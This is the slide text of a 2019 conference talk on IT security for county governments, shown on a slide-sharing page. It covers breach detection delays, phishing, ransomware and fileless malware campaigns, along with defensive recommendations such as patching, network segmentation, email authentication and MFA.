Se ha denunciado esta presentación.
Utilizamos tu perfil de LinkedIn y tus datos de actividad para personalizar los anuncios y mostrarte publicidad más relevante. Puedes cambiar tus preferencias de publicidad en cualquier momento.

Fears and fulfillment with IT security

154 visualizaciones

Publicado el

A talk given to the Minn. county IT conference in October 2019

Publicado en: Tecnología
  • Inicia sesión para ver los comentarios

  • Sé el primero en recomendar esto

Fears and fulfillment with IT security

  1. 1. Fears and Fulfillment with Today’s IT security David Strom, MnCCC annual security conference Oct 2019
  2. 2. Agenda • Current state of IT security • Typical multi-stage cyber infection chain: • Phishing probe • Ransomware and data theft • Lateral movement with fileless malware • Recommendations for improving your security posture
  4. 4. A sample of breach detection delays • Yahoo (3B accounts, 2013): many years to detect and notify • Marriott (383M guests, 2014-18): 4 years to detect, 2 mo. to notify • Advent Health (42k customers, 2017-18): 16 months to detect, 18 months to notify • Uber (57M customers, 2016): 1 year to detect and notify • eBay (145M users, 2014): 7 months to detect and notify • Heartland Payments (134M accounts, 2008): 9 months to detect
  5. 5. Let’s look at the telltale signs of a typical phishing attack
  6. 6. Phishing awareness education especially needed for these situations • Business working with a foreign supplier. • Business receiving or initiating a wire transfer request. • Business contacts receiving fraudulent correspondence. • Executive and attorney impersonations. • Confidential data theft.
  7. 7. Phishing prevention suggestions Examine the tone and phrasing of the email Have shared authority on money transfers Understand the underlying social engineering ploy Don’t get sucked in with a phony sense of urgency Trust but verify -- phone calls can be spoofed
  8. 8. Spread and prevention of ransomware
  9. 9. Don’t become Georgia! • City of Atlanta • State Department of Public Safety • State and local court systems • City hospitals • County governments • Small city police departments
  10. 10. Behind the Texas local government August attacks
  11. 11. The wrong things to focus on Did the victim pay up? What did it cost to restore data? What data was deleted or lost? How long were things out of commission?
  12. 12. Six bad IT decisions exposed by ransomware Sloppy infosec makes it hard to find root cause Inconsistent IT infrastructure ownership Delay patching and updates Poor disaster and backup procedures Lousy staff comms and poor disruption planning Mismatch asset value and protection policies
  13. 13. Three general types of attacks: •Return-object programming •Scripting-based •Polymorphic
  14. 14. Sample fileless malware campaigns • Target 2014 breach (flat network) • DNC 2016 hack (PowerShell and WMI entry) • August Stealer 2016 (Word macros and PowerShell) • 3ve group November 2018 (ad click fraud) • Netwire phishing campaign February 2019 (Vbscript, Gdrive) • Astaroth campaign July 2019 (PowerShell) • Poison Ivy 2018 (Word macro, shown next slide)
  15. 15. Here are four practical tips to help protect your network Apply patches quickly across all systems Segment your network carefully Restrict admin rights severely Disable un-needed Windows apps and protocols (SMBv1!)
  16. 16. Best practices for better security Have dedicated and trained breach response teams 1 Limit and segment IoT devices on your network 2 Use security automation tools whenever possible 3 Find breaches and contain them quickly 4 Vet your MSP security procedures 5
  17. 17. Use these three email authentication protocols SPF DKIM DMARC
  18. 18. DMARC, SPF, and other email security tech
  19. 19. Use MFA to protect ALL logins
  20. 20. Questions, connections • My website: • Twitter: @dstrom • Email: • Slide copies can be found here: